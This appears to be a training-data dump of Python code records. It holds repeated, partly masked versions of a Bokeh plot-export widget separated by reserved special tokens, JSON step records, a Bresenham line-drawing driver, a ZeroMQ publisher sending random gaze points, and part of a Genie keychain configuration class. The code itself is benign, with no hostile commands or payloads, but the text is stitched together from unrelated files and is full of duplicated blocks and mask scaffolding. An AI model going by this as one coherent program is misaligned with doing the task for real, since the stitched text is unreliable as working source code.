dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SaveFileDialog(FileDialog):
"""A file dialog that adds a default save path"""
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import asyncio
from pathlib import Path
from typing import List
from bokeh.models import Div, CustomAction, CustomJS
from view.dialog import FileDialog
from utils.gui import startfile
class SaveFileDialog(FileDialog):
"""A file dialog that adds a default save path"""
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Widget for exporting the data"
import asyncio
from pathlib import Path
from typing import List
from bokeh.models import Div, CustomAction, CustomJS
from view.dialog import FileDialog
from utils.gui import startfile
class SaveFileDialog(FileDialog):
"A file dialog that adds a default save path"
def __init__(self, ctrl):
super().__init__(ctrl, storage = "save")
def _defaultpath(ext, bopen):
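            # Default-path strategy: reuse the stem of the most recently
            # opened file inside the most recent save location, taking the
            # extension from the stored save path when it has one, otherwise
            # from the dialog's filetypes.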
assert not bopen
pot = [i for i in self.storedpaths(ctrl, "load", ext) if i.exists()]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, "save", ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa/Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent/Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = "xlsx:*.xlsx"
self.title = "Export plot data to excel"
def store(self, *_):
"store the path"
return self.__store(*_)
class CSVExporter:
"exports all to csv"
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) -> List[Div]:
"creates the widget"
dlg = SaveFileDialog(ctrl)
div = Div(text = "", width = 0, height = 0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)) else mainviews
figure = mainview.getfigure()
figure.tools = (
figure.tools
+ [
CustomAction(
action_tooltip = dlg.title,
callback = CustomJS(
code = 'div.text = div.text + " ";',
args = dict(div = div)
)
)
]
)
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == " " and div.text == ' ':
div.text = ""
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change("text", _cb)
return [div]
def reset(self, *_):
"reset all"
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False) # pylint: disable=not-callable
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
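# A minimal sketch of the JS -> Python bridge used by CSVExporter.addtodoc,
# assuming a Bokeh server session (make_demo_figure and its contents are
# illustrative, not part of the original module): a toolbar CustomAction can
# only run JS, so its callback appends a space to a hidden Div, and a Python
# on_change handler on that Div reacts server-side.
def make_demo_figure():
    from bokeh.plotting import figure

    div = Div(text="", width=0, height=0)
    fig = figure()
    fig.line([0, 1], [0, 1])
    fig.tools = fig.tools + [
        CustomAction(
            action_tooltip="demo export",
            callback=CustomJS(code='div.text = div.text + " ";', args=dict(div=div)),
        )
    ]

    def _cb(attr, old, new):
        if new == " ":
            div.text = ""  # reset the flag so the next click fires again
            print("toolbar button clicked")  # server-side reaction goes here

    div.on_change("text", _cb)
    return fig, div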
|
flexible
|
{
"blob_id": "d120172e65f329b1137df38b693e5fe7145bc80d",
"index": 2840,
"step-1": "<mask token>\n\n\nclass CSVExporter:\n <mask token>\n <mask token>\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-2": "<mask token>\n\n\nclass SaveFileDialog(FileDialog):\n <mask token>\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-3": "<mask token>\n\n\nclass SaveFileDialog(FileDialog):\n \"\"\"A file dialog that adds a default save path\"\"\"\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-4": "<mask token>\nimport asyncio\nfrom pathlib import Path\nfrom typing import List\nfrom bokeh.models import Div, CustomAction, CustomJS\nfrom view.dialog import FileDialog\nfrom utils.gui import startfile\n\n\nclass SaveFileDialog(FileDialog):\n \"\"\"A file dialog that adds a default save path\"\"\"\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"Widget for exporting the data\"\nimport asyncio\nfrom pathlib import Path\nfrom typing import List\nfrom bokeh.models import Div, CustomAction, CustomJS\nfrom view.dialog import FileDialog\nfrom utils.gui import startfile\n\nclass SaveFileDialog(FileDialog):\n \"A file dialog that adds a default save path\"\n def __init__(self, ctrl):\n super().__init__(ctrl, storage = \"save\")\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, \"load\", ext) if i.exists()]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n\n pot = self.storedpaths(ctrl, \"save\", ext)\n sav = self.firstexistingparent(pot)\n\n if ope is None:\n return sav\n\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa/Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent/Path(ope).stem).with_suffix(psa.suffix)\n\n self.defaultextension = sav.suffix[1:] if sav.suffix != '' else None\n return str(sav)\n\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = \"xlsx:*.xlsx\"\n self.title = \"Export plot data to excel\"\n\n def store(self, *_):\n \"store the path\"\n return self.__store(*_)\n\nclass CSVExporter:\n \"exports all to csv\"\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) -> List[Div]:\n \"creates the widget\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text = \"\", width = 0, height = 0)\n\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)) else mainviews\n figure = mainview.getfigure()\n\n figure.tools = (\n figure.tools\n + [\n CustomAction(\n action_tooltip = dlg.title,\n callback = CustomJS(\n code = 'div.text = div.text + \" \";',\n args = dict(div = div)\n )\n )\n ]\n )\n\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == \" \" and div.text == ' ':\n div.text = \"\"\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n\n div.on_change(\"text\", _cb)\n return [div]\n\n def reset(self, *_):\n \"reset all\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False) # pylint: disable=not-callable\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-ids": [
2,
7,
8,
9,
10
]
}
|
[
2,
7,
8,
9,
10
] |
from GRAFICA_BRESENHAMS import Bresenhams
def main():
x = int(input('INGRESA VALOR PARA X: \n'))
y = int(input('INGRESA VALOR PARA Y: \n'))
x1 = int(input('INGRESA VALOR PARA X1: \n'))
y1 = int(input('INGRESA VALOR PARA Y1: \n'))
Bresenhams(x, y, x1, y1)
if __name__ == '__main__':
main()
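# GRAFICA_BRESENHAMS itself is not part of this record; for context, a
# minimal integer-only Bresenham line walk (a hedged sketch, without
# whatever plotting the original module performs) could look like this:
def bresenham_points(x, y, x1, y1):
    """Yield the grid points of the line from (x, y) to (x1, y1)."""
    dx, dy = abs(x1 - x), abs(y1 - y)
    sx = 1 if x < x1 else -1
    sy = 1 if y < y1 else -1
    err = dx - dy
    while True:
        yield x, y
        if x == x1 and y == y1:
            break
        e2 = 2 * err
        if e2 > -dy:
            err -= dy
            x += sx
        if e2 < dx:
            err += dx
            y += sy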
|
normal
|
{
"blob_id": "e75bee4e014aa369131c3e200ce874a8840b5690",
"index": 3573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from GRAFICA_BRESENHAMS import Bresenhams\n\n\ndef main():\n x = int(input('INGRESA VALOR PARA X: \\n'))\n y = int(input('INGRESA VALOR PARA Y: \\n'))\n x1 = int(input('INGRESA VALOR PARA X1: \\n'))\n y1 = int(input('INGRESA VALOR PARA Y1: \\n'))\n Bresenhams(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import print_function
import zmq
import time
import random
import numpy as np
import msgpack as serializer
port = '42000'
# let the OS choose the IP and PORT
ipc_sub_url = 'tcp://*:*'
ipc_push_url = 'tcp://*:*'
# starting communication threads
zmq_ctx = zmq.Context()
pub_socket = zmq_ctx.socket(zmq.PUB)
pub_socket.bind("tcp://*:%s" % port)
# send messages
while True:
topic = 'test'
thisX = np.random.rand()
thisY = np.random.rand()
testDict = {'gaze':(thisX, thisY)}
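	# two-frame multipart message: the topic string goes first (SNDMORE keeps
	# the envelope open), then the msgpack-encoded payload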
pub_socket.send_string(topic, zmq.SNDMORE)
pub_socket.send(serializer.dumps(testDict, use_bin_type=True))
print(testDict)
time.sleep(.02)
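# A matching subscriber, as a hedged sketch (a separate script; the port and
# topic mirror the publisher above, and msgpack raw=False pairs with
# use_bin_type=True on the sending side):
#
#   import zmq
#   import msgpack as serializer
#
#   ctx = zmq.Context()
#   sub = ctx.socket(zmq.SUB)
#   sub.connect("tcp://localhost:42000")
#   sub.setsockopt_string(zmq.SUBSCRIBE, "test")
#   while True:
#       topic = sub.recv_string()
#       payload = serializer.loads(sub.recv(), raw=False)
#       print(topic, payload)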
|
normal
|
{
"blob_id": "cb469b69bf974d39609f79c4f3be686d8106f971",
"index": 1431,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-3": "<mask token>\nport = '42000'\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-4": "from __future__ import print_function\nimport zmq\nimport time\nimport random\nimport numpy as np\nimport msgpack as serializer\nport = '42000'\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind('tcp://*:%s' % port)\nwhile True:\n topic = 'test'\n thisX = np.random.rand()\n thisY = np.random.rand()\n testDict = {'gaze': (thisX, thisY)}\n pub_socket.send_string(topic, zmq.SNDMORE)\n pub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n print(testDict)\n time.sleep(0.02)\n",
"step-5": "from __future__ import print_function\nimport zmq\nimport time\nimport random\nimport numpy as np \nimport msgpack as serializer\n\nport = '42000'\n\n# let the OS choose the IP and PORT\nipc_sub_url = 'tcp://*:*'\nipc_push_url = 'tcp://*:*'\n\n# starting communication threads\nzmq_ctx = zmq.Context()\npub_socket = zmq_ctx.socket(zmq.PUB)\npub_socket.bind(\"tcp://*:%s\" % port)\n\n\n# send messages\nwhile True:\n\ttopic = 'test'\n\tthisX = np.random.rand()\n\tthisY = np.random.rand()\n\ttestDict = {'gaze':(thisX, thisY)}\n\tpub_socket.send_string(topic, zmq.SNDMORE)\n\tpub_socket.send(serializer.dumps(testDict, use_bin_type=True))\n\tprint(testDict)\n\ttime.sleep(.02)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from enum import Enum
# Genie
from genie.decorator import managedattribute
from genie.conf.base import Base, \
DeviceFeature, \
LinkFeature, \
Interface
import genie.conf.base.attributes
from genie.libs.conf.base.feature import consolidate_feature_args
from genie.conf.base.attributes import SubAttributes, \
SubAttributesDict, \
AttributesHelper, \
KeyedSubAttributes
from genie.conf.base.attributes import InterfaceSubAttributes
from genie.libs import parser
from genie.abstract import Lookup
from genie.ops.base import Base as ops_Base
from genie.ops.base import Context
__all__ = ('Keychains', )
# Structure Hierarchy:
# Keychains
# +--DeviceAttributes
# +-- KeyChainAttributes
# | +-- KeyIdAttributes
# +-- KeyChainMacSecAttributes
# | +-- KeyIdAttributes
# +-- KeyChainTunEncAttributes
# +-- KeyIdAttributes
class Keychains(DeviceFeature):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# =============================================
# Device attributes
# =============================================
class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):
# KeyChainAttributes
class KeyChainAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
keychain_attr = managedattribute(name='keychain_attr',
read_only=True,
doc=KeyChainAttributes.__doc__)
@keychain_attr.initter
def keychain_attr(self):
return SubAttributesDict(self.KeyChainAttributes, parent=self)
# KeyChainMacSecAttributes
class KeyChainMacSecAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.ms_key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
ms_keychain_attr = managedattribute(
name='ms_keychain_attr',
read_only=True,
doc=KeyChainMacSecAttributes.__doc__)
@ms_keychain_attr.initter
def ms_keychain_attr(self):
return SubAttributesDict(self.KeyChainMacSecAttributes,
parent=self)
# KeyChainTunEncAttributes
class KeyChainTunEncAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.te_key_chain = key
super().__init__(parent)
# KeyIdAttributes
class KeyIdAttributes(KeyedSubAttributes):
def __init__(self, parent, key):
self.key_id = key
super().__init__(parent)
key_id_attr = managedattribute(name='key_id_attr',
read_only=True,
doc=KeyIdAttributes.__doc__)
@key_id_attr.initter
def key_id_attr(self):
return SubAttributesDict(self.KeyIdAttributes, parent=self)
te_keychain_attr = managedattribute(
name='te_keychain_attr',
read_only=True,
doc=KeyChainTunEncAttributes.__doc__)
@te_keychain_attr.initter
def te_keychain_attr(self):
return SubAttributesDict(self.KeyChainTunEncAttributes,
parent=self)
device_attr = managedattribute(name='device_attr',
read_only=True,
doc=DeviceAttributes.__doc__)
@device_attr.initter
def device_attr(self):
return SubAttributesDict(self.DeviceAttributes, parent=self)
# ============ managedattributes ============#
key_id = managedattribute(name='key_id',
default=None,
type=(None, managedattribute.test_istype(str)),
doc='Configure a key')
key_enc_type = managedattribute(name='key_enc_type',
default=None,
type=managedattribute.test_istype(int),
doc='Set key encode type')
key_string = managedattribute(name='key_string',
default=None,
type=(None,
managedattribute.test_istype(str)),
doc='Set key string')
class CRYPTO_ALGO(Enum):
aes_128_cmac = 'aes-128-cmac'
aes_256_cmac = 'aes-256-cmac'
crypto_algo = managedattribute(
name='crypto_algo',
default=None,
type=(None, CRYPTO_ALGO),
doc='Set cryptographic authentication algorithm')
lifetime_start = managedattribute(
name='lifetime_start',
default=None,
type=(None, managedattribute.test_istype(str)),
doc='Set start time for sending lifetime of encryption key')
lifetime_duration = managedattribute(
name='lifetime_duration',
default=None,
type=(None, managedattribute.test_istype(int)),
doc='Set key lifetime duration')
# =========================================================
# build_config
# =========================================================
def build_config(self,
devices=None,
interfaces=None,
links=None,
apply=True,
attributes=None,
**kwargs):
attributes = AttributesHelper(self, attributes)
cfgs = {}
devices, interfaces, links = \
consolidate_feature_args(self, devices, interfaces, links)
for key, sub, attributes2 in attributes.mapping_items('device_attr',
keys=devices,
sort=True):
cfgs[key] = sub.build_config(apply=False, attributes=attributes2)
if apply:
for device_name, cfg in sorted(cfgs.items()):
self.testbed.config_on_devices(cfg, fail_invalid=True)
